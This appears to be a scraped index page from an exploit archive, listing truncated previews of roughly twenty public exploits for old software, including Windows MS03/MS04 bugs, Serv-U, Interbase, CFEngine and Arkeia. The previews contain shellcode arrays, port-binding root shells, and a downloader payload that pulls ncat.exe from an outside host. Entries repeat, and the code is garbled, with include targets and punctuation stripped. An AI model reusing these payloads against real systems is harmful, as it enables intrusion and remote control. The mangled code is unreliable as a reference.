MS Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)

Exploit for unknown platform in category local exploits ================================================================ MS Windows XP Task Scheduler .job Universal Exploit MS04-022 ================================================================ / HOD-ms04022-task-expl.c: MS04-022 Microsoft...

Borland Interbase 7.x - Remote Buffer Overflow

!/usr/bin/perl Priv8security com remote exploit for Borland Interbase 7.1 SP 2 and lower Public Version!!! Bug found by Aviram Jenik www.securiteam.com unixfocus 5AP0P0UCUO.html wsxz@localhost buffer$ perl priv8ibserverb.pl -h localhost -t 0 -= Priv8security.com InterBase Server 7.1 SP2 and lower...

Solaris 10.x ESRI Arcgis Local Root Format String Exploit

Exploit for solaris platform in category local exploits ========================================================= Solaris 10.x ESRI Arcgis Local Root Format String Exploit ========================================================= / ESRI 9.x Arcgis local root format string exploit Copyright Kevin...

SquirrelMail - chpasswd Local Buffer Overflow

SquirrelMail - chpasswd Local Buffer Overflow / 0x3142-sq-chpasswd.c Squirremail chpasswd buffer overflow. Tested on SuSE 9. The bug was found by Matias Neiff Coded by x314 c 2004 Copyright by x314. All Rights Reserved. Greets: m0s krewz. / include char shellcode=...

Monit 4.2 - Remote Buffer Overflow

Monit 4.2 - Remote Buffer Overflow / THE EYE ON SECURITY RESEARCH GROUP - INDIA www eos-india net poc 305monit.c Remote Root Exploit for Monit include include include include define BUFFSIZE 2048 define PADDING 40 define EXPSIZE 256+4+PADDING define MAXARCH 2 struct eos char arch; unsigned long...

eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow

!/usr/bin/perl eSignal v7.6 remote exploit c VizibleSoft == http://viziblesoft.com/insect 25-mAR-2004 use IO::Socket; sub usage die"\nUsage: perl $0 host port\n"; print "\r\neSignal v7.6 remote exploit, c VizibleSoft.com\r\n"; my $ip = $ARGV0 || usage; my $port = $ARGV1 || usage; my $data = ""; m...

BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String

include include include include // WIN NT/2K/XP cmd.exe shellcode // kernel32.dll baseaddress calculation: OS/SP-independent // string-save: 00, 0a and 0d free. // portbinding: port 28876 // looping: reconnect after disconnect char shellcode =...

RhinoSoft Serv-U FTPd Server 4.x - site chmod Remote Buffer Overflow

RhinoSoft Serv-U FTPd Server 4.x - site chmod Remote Buffer Overflow include include include include define exploitlength 511 define NOP 'A' define SEHhandleroffset 400 char SEHhandler = "\x41\x41\xEB\x04"; // 3 jmp over next four bytes char retaddress4004 = "\xab\x1c\x5f\x01"; // 1...

IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow

!/usr/bin/perl -w IA WebMail 3.x iaregdll.dll version 1.0.0.5 Remote Exploit Application Specific Shellcode: URL Downloader - www elitehaven net/ncat.exe downloaded - c:\nc.exe created By Peter Winter-Smith peter4020 hotmail com Shellcode included - will need reassembling to use different urls an...

IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit

No description provided by source. !/usr/bin/perl -w IA WebMail 3.x iaregdll.dll version 1.0.0.5 Remote Exploit Application Specific Shellcode: URL Downloader - www elitehaven net/ncat.exe downloaded - c:\nc.exe created By Peter Winter-Smith peter4020 hotmail com Shellcode included - will need...

IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit

Exploit for unknown platform in category remote exploits ============================================================ IA WebMail 3.x iaregdll.dll version 1.0.0.5 Remote Exploit ============================================================ !/usr/bin/perl -w IA WebMail 3.x iaregdll.dll version 1.0.0...

Microsoft Windows - ListBox/ComboBox Control Local (MS03-045)

/ \ local ListBox/ComboBox exploit for Win32 / \ Created by xCrZx crazyeinstein yahoo com /11.11.03/ / \ Usage: MS03-045.exe -r return address / \ there is two targets: CBDIR for ComboBox, LBDIR for ListBox. / \ As to return address it should be such as 0x0000XXYY / and you should know that this...

MS Windows (ListBox/ComboBox Control) Local Exploit (MS03-045)

Exploit for unknown platform in category local exploits ============================================================== MS Windows ListBox/ComboBox Control Local Exploit MS03-045 ============================================================== / \ local ListBox/ComboBox exploit for Win32 / \ Created...

Microsoft Windows XP2000 - Workstation Service Overflow (MS03-049)

Microsoft Windows XP2000 - Workstation Service Overflow MS03-049 / Proof of concept for MS03-049. This code was tested on a Win2K SP4 with FAT32 file system, and is supposed to work only with that it will probably crash the the other 2Ks, no clue about XPs. To be compiled with lcc-win32 hint link...

MS Windows 2000/XP Workstation Service Overflow (MS03-049)

Exploit for unknown platform in category remote exploits ========================================================== MS Windows 2000/XP Workstation Service Overflow MS03-049 ========================================================== / Proof of concept for MS03-049. This code was tested on a Win2K...

Microsoft Windows - DCOM RPC2 Universal Shellcode

MS Windows DCOM RPC2 Universal Shellcode. Shellcode exploit for win32 platform ; Segment type: Pure code ;seg000 segment byte public 'CODE' use32 ; assume cs:seg000 ; assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing .386 assume cs:seg000 var29C = byte ptr -29Ch var28C = byte ptr...

MS Windows (DCOM RPC2) Universal Shellcode

Exploit for win32 platform in category shellcode ========================================== MS Windows DCOM RPC2 Universal Shellcode ========================================== ; Segment type: Pure code ;seg000 segment byte public 'CODE' use32 ; assume cs:seg000 ; assume es:nothing, ss:nothing,...

GNU CFEngine 2.-2.0.3 - Remote Stack Overflow

GNU CFEngine 2.-2.0.3 - Remote Stack Overflow !/usr/bin/perl -s kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003. forking portbind shellcode port=0xb0ef45295 by eSDee bug discovered by nick cleaton, tested on FreeBSD 4.8-RELEASE use IO::Socket; if!$ARGV1 print "usage:...

GNU CFEngine 2.-2.0.3 - Remote Stack Overflow

!/usr/bin/perl -s kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003. forking portbind shellcode port=0xb0ef45295 by eSDee bug discovered by nick cleaton, tested on FreeBSD 4.8-RELEASE use IO::Socket; if!$ARGV1 print "usage: ./DSR-cfengine.pl default cfengine is 5308\n"; exit-1;...

Knox Arkeia Pro v5.1.12 remote root exploit

Exploit attached for Knox Arkeia Pro v5.1.12 backup software from http://www.arkeia.com. / Knox Arkiea arkiead local/remote root exploit. Portbind 5074 shellcode Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable. NULLs out least significant byte of EBP to pull EIP out of...